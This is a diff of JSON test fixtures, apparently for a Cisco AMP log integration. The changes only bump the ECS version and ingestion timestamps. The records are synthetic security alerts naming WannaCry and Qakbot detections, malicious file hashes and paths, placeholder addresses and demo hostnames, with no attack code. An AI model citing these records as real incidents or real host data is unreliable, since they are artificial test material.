\",\"id\":\"d2616Ab846\",\"name\":\"WMIPRVSE Launched Encoded Powershell Command\",\"observables\":{\"file\":[{\"md5\":\"a575a7610e5f003cc36df39e07c4ba7d\",\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"88e7cdc0b75364418e11b2c53f772085f1b61d1e\",\"sha256\":\"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218\",\"size\":443392,\"type_id\":1},{\"md5\":\"d683c112190f4b4c6d477d693ee88e35\",\"name\":\"WmiPrvSE.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"67858ead93feed62c0b1865369840e6e8086f53b\",\"sha256\":\"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334\",\"size\":425984,\"type_id\":1}]},\"remediated\":false,\"severity\":\"medium\",\"silent\":false,\"start_ts\":1610640884,\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"],\"type\":\"activity\",\"normalized\":{\"observables\":{\"file\":{\"name\":[\"powershell.exe\",\"wmiprvse.exe\"],\"path\":[\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\",\"c:\\\\windows\\\\system32\\\\wbem\"]}},\"name\":\"wmiprvse launched encoded powershell command\"},\"ts\":1610640884},\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"]}}", "id": "6880683125978957000", "kind": "alert" @@ -2600,7 +2600,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2620,7 +2620,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500191289Z", + "ingested": "2021-09-13T18:07:28.111198245Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2675,7 +2675,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2695,7 +2695,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500193359Z", + "ingested": "2021-09-13T18:07:28.111200321Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2750,7 +2750,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2770,7 +2770,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500195409Z", + "ingested": "2021-09-13T18:07:28.111202401Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2825,7 +2825,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2845,7 +2845,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500197554Z", + "ingested": "2021-09-13T18:07:28.111204552Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2902,7 +2902,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2926,7 +2926,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500199614Z", + "ingested": "2021-09-13T18:07:28.111206627Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831755\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2981,7 +2981,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3005,7 +3005,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500201691Z", + "ingested": "2021-09-13T18:07:28.111208689Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831754\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -3060,7 +3060,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3084,7 +3084,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500203753Z", + "ingested": "2021-09-13T18:07:28.111210770Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":873000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831753\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qeriuwjhrf\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\qeriuwjhrf\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -3139,7 +3139,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3163,7 +3163,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500205814Z", + "ingested": "2021-09-13T18:07:28.111212848Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":732000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -3218,7 +3218,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3242,7 +3242,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500207872Z", + "ingested": "2021-09-13T18:07:28.111214921Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -3297,7 +3297,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3321,7 +3321,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500209928Z", + "ingested": "2021-09-13T18:07:28.111216991Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -3376,7 +3376,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3400,7 +3400,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500212001Z", + "ingested": "2021-09-13T18:07:28.111219057Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -3453,7 +3453,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3473,7 +3473,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500214055Z", + "ingested": "2021-09-13T18:07:28.111221104Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3532,7 +3532,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3564,7 +3564,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500216107Z", + "ingested": "2021-09-13T18:07:28.111223166Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3619,7 +3619,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3645,7 +3645,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500218150Z", + "ingested": "2021-09-13T18:07:28.111225235Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870786\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"\",\"file_path\":\"\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3702,7 +3702,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3734,7 +3734,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500220195Z", + "ingested": "2021-09-13T18:07:28.111227296Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3787,7 +3787,7 